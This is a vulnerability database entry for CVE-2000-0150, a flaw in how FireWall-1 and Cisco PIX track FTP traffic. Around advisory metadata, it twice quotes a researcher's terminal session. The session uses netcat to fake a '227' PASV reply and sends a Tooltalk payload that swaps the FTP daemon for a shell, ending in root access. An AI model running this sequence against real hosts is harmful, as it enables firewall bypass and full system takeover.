var-200002-0050
Vulnerability from variot
Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1. FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port. In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services. The details of the vulnerability posted by John McDonald jm@dataprotect.com contained the following example: "Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4. [root@gumpe /root]# strings hackfile localhost """"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd [root@gumpe /root]# /sbin/ifconfig eth0 mtu 100 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [1]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [2]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open id uid=0(root) gid=0(root) There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem." In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine. This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200002-0050",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "firewall-1",
"scope": "eq",
"trust": 1.6,
"vendor": "checkpoint",
"version": "4.0"
},
{
"model": "firewall-1",
"scope": "eq",
"trust": 1.6,
"vendor": "checkpoint",
"version": "3.0"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(6b\\)"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.2\\(2\\)"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.3"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(6\\)"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.2\\(1\\)"
},
{
"model": "pix firewall software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.4\\(4\\)"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ip filter",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "watchguard",
"version": null
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.4(4)"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.3"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.2"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.1"
},
{
"model": "pix firewall b",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1.6"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1.6"
},
{
"model": "point software firewall-1",
"scope": "eq",
"trust": 0.3,
"vendor": "check",
"version": "4.0"
},
{
"model": "point software firewall-1",
"scope": "eq",
"trust": 0.3,
"vendor": "check",
"version": "3.0"
},
{
"model": "pix firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability was posted to the Bugtraq mailing list on February 9, 2000 by John McDonald \u003cjm@dataprotect.com\u003e. It contained a set of work developed by both McDonald and Thomas Lopatic \u003ctl@dataprotect.com\u003e",
"sources": [
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
}
],
"trust": 0.9
},
"cve": "CVE-2000-0150",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2000-0150",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-1729",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2000-0150",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#328867",
"trust": 0.8,
"value": "24.10"
},
{
"author": "CNNVD",
"id": "CNNVD-200002-044",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-1729",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "VULHUB",
"id": "VHN-1729"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client\u0027s PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1. \nFireWall-1 monitors packets from the FTP server to the client, looking for the string \"227 \" at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port. \nIn FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1\u0027s list of well known TCP services. \nThe details of the vulnerability posted by John McDonald \u003cjm@dataprotect.com\u003e contained the following example:\n\"Here is an example of an attack based on this technique. There is\na FireWall-1 machine between gumpe and the 172.16.0.2 server, which\nonly permits incoming FTP connections. 172.16.0.2 is a default\nSolaris 2.6 install, with the Tooltalk Database vulnerability. \nWe send the datagram directly to the service\u0027s TCP port, in spite of\nthis port being blocked by the firewall. Note that since there is no\nresponse expected, the one-way restriction doesn\u0027t affect this\nattack. \nAll of our testing was done on a Nokia IPSO machine running FW-1\nversion 4.0.SP-4. \n[root@gumpe /root]# strings hackfile\nlocalhost\n\"\"\"\"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f\n/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd\n[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100\n[root@gumpe /root]# nc -vvv 172.16.0.2 21\n172.16.0.2: inverse host lookup failed:\n(UNKNOWN) [172.16.0.2] 21 (?) open\n220 sol FTP server (SunOS 5.6) ready. \n...........................................227 (172,16,0,2,128,7)\n500 \u0027........................................... \n[1]+ Stopped nc -vvv 172.16.0.2 21\n[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775\n172.16.0.2: inverse host lookup failed:\n(UNKNOWN) [172.16.0.2] 32775 (?) open\nsent 80, rcvd 0\n[root@gumpe /root]# nc -vvv 172.16.0.2 21\n172.16.0.2: inverse host lookup failed:\n(UNKNOWN) [172.16.0.2] 21 (?) open\n220 sol FTP server (SunOS 5.6) ready. \n...........................................227 (172,16,0,2,128,7)\n500 \u0027........................................... \n[2]+ Stopped nc -vvv 172.16.0.2 21\n[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775\n172.16.0.2: inverse host lookup failed:\n(UNKNOWN) [172.16.0.2] 32775 (?) open\nsent 1168, rcvd 0\n[root@gumpe /root]# nc -vvv 172.16.0.2 21\n172.16.0.2: inverse host lookup failed:\n(UNKNOWN) [172.16.0.2] 21 (?) open\nid\nuid=0(root) gid=0(root)\nThere is an easier way to perform a similar attack on this setup, since\nthe default Solaris FTP daemon allows a bounce attack, but this should\nsuffice to demonstrate the potential severity of this problem.\"\nIn summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine. \nThis vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0150"
},
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "BID",
"id": "979"
},
{
"db": "VULHUB",
"id": "VHN-1729"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#328867",
"trust": 2.5
},
{
"db": "BID",
"id": "979",
"trust": 2.0
},
{
"db": "NVD",
"id": "CVE-2000-0150",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "4417",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-1729",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "VULHUB",
"id": "VHN-1729"
},
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"id": "VAR-200002-0050",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-1729"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-22T22:48:48.755000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.securityfocus.com/bid/979"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/328867"
},
{
"trust": 2.7,
"url": "http://www.osvdb.org/4417"
},
{
"trust": 0.8,
"url": "http://www.ietf.org/rfc/rfc959.txt"
},
{
"trust": 0.8,
"url": "http://www.ietf.org/rfc/rfc2581.txt"
},
{
"trust": 0.8,
"url": "http://online.securityfocus.com/archive/1/47688/2000-02-12/2000-02-18/1"
},
{
"trust": 0.8,
"url": "http://online.securityfocus.com/archive/82/45758/2000-02-08/2000-02-14/1"
},
{
"trust": 0.3,
"url": "http://www.checkpoint.com/techsupport/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/warp/public/707/sec_incident_response.shtml"
},
{
"trust": 0.1,
"url": ""
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "VULHUB",
"id": "VHN-1729"
},
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#328867"
},
{
"db": "VULHUB",
"id": "VHN-1729"
},
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-10-08T00:00:00",
"db": "CERT/CC",
"id": "VU#328867"
},
{
"date": "2000-02-12T00:00:00",
"db": "VULHUB",
"id": "VHN-1729"
},
{
"date": "2000-02-09T00:00:00",
"db": "BID",
"id": "979"
},
{
"date": "2000-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"date": "2000-02-12T05:00:00",
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-03-07T00:00:00",
"db": "CERT/CC",
"id": "VU#328867"
},
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-1729"
},
{
"date": "2000-02-09T00:00:00",
"db": "BID",
"id": "979"
},
{
"date": "2006-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200002-044"
},
{
"date": "2024-11-20T23:31:49.937000",
"db": "NVD",
"id": "CVE-2000-0150"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple vendors\u0027 firewalls do not adequately keep state of FTP traffic",
"sources": [
{
"db": "CERT/CC",
"id": "VU#328867"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "979"
},
{
"db": "CNNVD",
"id": "CNNVD-200002-044"
}
],
"trust": 0.9
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.